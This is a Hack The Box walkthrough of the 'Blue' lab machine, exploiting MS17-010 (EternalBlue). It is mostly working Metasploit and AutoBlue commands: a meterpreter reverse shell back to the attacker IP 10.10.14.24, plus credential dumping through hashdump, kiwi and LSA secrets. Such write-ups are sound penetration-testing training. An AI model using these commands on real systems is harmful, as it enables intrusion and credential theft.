Blue

HTB - 3. Blue (MS17.010)

1. nmap -T4 -p- -A 10.10.10.40 shows 139 & 445 (smb) open, version Windows 7 Professional 7601 Service Pack 1, computer name is haris-PC, message signing enabled by not required,

2. Metaploit Test if vulnerable

   Copy

   sudo msfconsole
   search ms17-010
   use auxiliary/scanner/smb/smb_ms17_010
   options
   set rhosts 10.10.10.40
   run

   Result: Host is likely vulnerable

   Exploit:

   Copy

   use exploit/windows/smb/ms17_010_eternalblue
   set rhosts 10.10.10.40
   show targets
   run

   Result: shell popped with nt authoirty/system

   Used an un-staged payload, so lets try staged and get a meterpreter

   Copy

   set payload windows/x64/meterpreter/reverse_tcp
   options
   run
   getuid
   sysinfo
   hashdump
   shell
   route print
   arp -a
   netstat -ano
   load kiwi
   help
   creds_all
   lsa_dump_sam
   lsa_dump_secrets
   load incognito
   list_tokens -u

3. Autoblue: https://github.com/3ndG4me/AutoBlue-MS17-010

   Copy

   git clone https://github.com/3ndG4me/AutoBlue-MS17-010
   cd AutoBlue-MS17-010
   ls
   python eternalblue_checker.py 10.10.10.40

   Result: Target not patched

   Exploit:

   Copy

   cd shellcode
   sudo ./shell_prep.sh
   y
   10.10.14.24
   4445
   4446
   0 <-- Meterpreter instead of shell
   0 <-- Staged instead of un-staged
   cd ..
   ls
   sudo ./listener_prep.sh
   10.10.14.24
   4445
   4446
   0
   0
   python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin
   sessions
   sessions 1
   getuid
   whoami
   sysinfo